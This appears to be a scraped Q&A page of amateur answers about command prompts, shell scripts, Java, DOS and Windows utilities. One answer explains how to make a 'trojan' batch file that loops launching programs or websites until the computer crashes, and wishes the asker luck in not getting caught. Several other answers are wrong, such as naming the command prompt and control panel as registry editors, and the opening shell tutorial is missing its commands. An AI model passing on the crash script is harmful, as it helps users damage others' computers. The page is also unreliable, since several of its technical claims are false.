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You'll have to learn some shell scripting. for example, in the terminal :


will create a file for you to write extension is needed

suppose you typed in

"echo hello world"

and saved the file [press escape and then shift+z+z]

then when u type in ./ in the terminal, the following message will be displayed :

hello world

That's how it starts!!!

All you need!

A clarification on the above answer: the extension .sh is not required, since Unix does not need extensions of any kind. It is, however, helpful to include it for documentation purposes (so you know what the intent of the file is).

Secondly, the shell file created above will not execute unless the permissions are set appropriately. They should have 'read' and 'execute' permission to run on the command line as described above.

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Q: How can you use utility programs and shell prompt to create your own applications?
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Why can't you open the java development tool?

The Java Development Kit (JDK) is a command-line based application. That means it is run through the command prompt. The usage of this is similar with all platforms, however for each operating system it is different. For Windows, go to Start -> Programs (All programs on XP) -> Accessories -> Command Prompt. It will show a black screen in which you type commands in. For Macs, go to Applications -> Utilities -> Terminal In the prompt, type 'java' or 'javac'. As the compiler is 'javac', you may need to add an enviornmental variable to point to the location of Java (javafolder/bin/javac.exe)

How do you create a virus from the command prompt?

You cannot create a virus directly from the command prompt, but you can create one from a batch file. I only know how to create trojans, in the form below, which must be entered in a notepad. :loop start "file" goto loop where "file" is typed, enter the syntax of the file or program you want to be opened, or a website address. that file, program, or website will then be repetatively opened until the computer crashes. Multiple files, programs, and websites can be set to be opened in the following format: :loop start "file" start "file goto loop I hope this will help you, and i wish you luck in not getting caught, as creating viruses, trojans, and other malwear is illeagle.

How can you undo something you put into command prompt?

There is usually no way to undo a command. Everything executed in the command prompt, is usually final, and has to be manually undone via the same way it was done. There are some command line programs that allow you to undo what it has done. But with the vagueness of your question I am unable to give you a definitive answer. NOTE: Deleting a file from the command line is irreversible and external software will be needed to retrieve the file.

How do i open a java file in Microsoft visual studio using the command prompt i know you would type notepad helloworld period java to open a java program in notepad but how do i do it for MVS?

You don't want to use Microsoft Visual Studio to edit/run Java programs... Use the Eclipse IDE instead... Visual Studio's only for C/C++ language programs.

I have to make a restaurant in C plus plus visual studio and i have a menu come up in my command prompt. Is there a way i can open another command prompt simultaneously so i can have an order form?

Yes but then you would have to write two programs. One for your menu console and another for your order form console. The order form can be spawned from your menu. Am not sure why you you would want to develop this "restaurant" in a console instead of a fully-fledged Windows application, but each to his own...

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Please go to RUN from START in desktop Type cmd. It will take you to DOS prompt. Create a directory of your choice by using command: md Copy the dbase III plus .exe file to this directory Type dbase at the command prompt. This will take you to .prompt. (dot prompt) From here use use commands such as USE-for using an existing file CREATE to create a new .dbf file. G.BADARIVISHAL MYSORE SOUTH INDIA 13-05-2013

Which utility would you use to retrieve a computers mac address?

For Windows open a command prompt (Clicking "Start -> All Programs -> Accessories -> Command Prompt" -OR- by typing "CMD" (no quotes) on the run line and hitting enter) Once in the command prompt, type the following: ipconfig /all ...and hit enter. The MAC address of your NIC should be listed as "Physical Address"

Will DOS programs run on modern laptops?

Yes, although there are various technical limitations that may come into play. For instance, not all DOS applications will run properly in a Command Prompt on Windows. The Command Prompt in Windows Vista and Windows 7, for instance, can only run text-mode DOS applications. 64-bit versions cannot run DOS applications at all. The best workaround is to use DOSBox, a DOS emulator, to run any applications that will not run in the Command Prompt. As for "native" installations, it is still possible to install and run MS-DOS and applications on modern computers, although changes may need to be made in the BIOS to enable hard drive access, and modern sound cards are incompatible with virtually all DOS programs.

How do you make c plus plus run outside command prompt?

You don't run C++, you run programs. C++ is just a language. The programs you create with C++ must be compiled and linked in order to run. All programs can be run from the command line, however not all programs are intended to be run in a console window (console applications). Under Windows, for instance, your project must include various headers specific to the Windows platform (such as windows.h), in order to create Windows applications. Your IDE will generally have options that allow you to change project-specific options, however it is usually easier to start a new project from scratch and choose the type of application you want to create (console or windowed). The IDE will often provide additional options dependent upon the type of application you choose, essentially providing you with a skeleton program that you can modify to suit your project's specific needs.

How do you run a DOS program in a window?

you have to use the command prompt(also called the DOS prompt by older users. You can find this by going to "start" , "programs" , "accessories" and "command prompt"

How do you go into DOS?

Start>All Programs>Accessories>Command Prompt

What is shell prompt?

The shell prompt is the visual aspect of the shell between running programs, th epart that shows it is waiting for you to give it a command.

List the steps to add a shortcut to your Windows desktop to access a command prompt window?

There is technically no specific way to do what you are asking here...If an application is DOS based, then it does not need a shortcut to be started through command prompt, you can just create a shortcut to the executable itself, and it will automatically run in a DOS environment.You can't really create a shortcut to Command Prompt as you will probably get some System32 error on Windows. Butt you can create a batch file (.bat)Open up NotepadType "" (Without Quates)The File -> Save AsName it as anything, I usually name it "CMD"Then add ".bat"Under "Save As Type" drop the box down and select "All Files"Then you can run Command PromptOr you could just drag and drop Command Prompt from the Start Menu to the Desktop.

What windows networking utility can tell you what your IP address is?

From a command prompt, you can use the command "ipconfig" to display your ip address.

Which two windows programs allow you to edit the registry?

command prompt and control panel

What are two ways to access a command prompt for windows 9x Me.?

click start, programs, and MS-Dos prompt when you boot from a bootable disk or a windows 9x Me startup disk, you get a command prompt instead of the windows desktop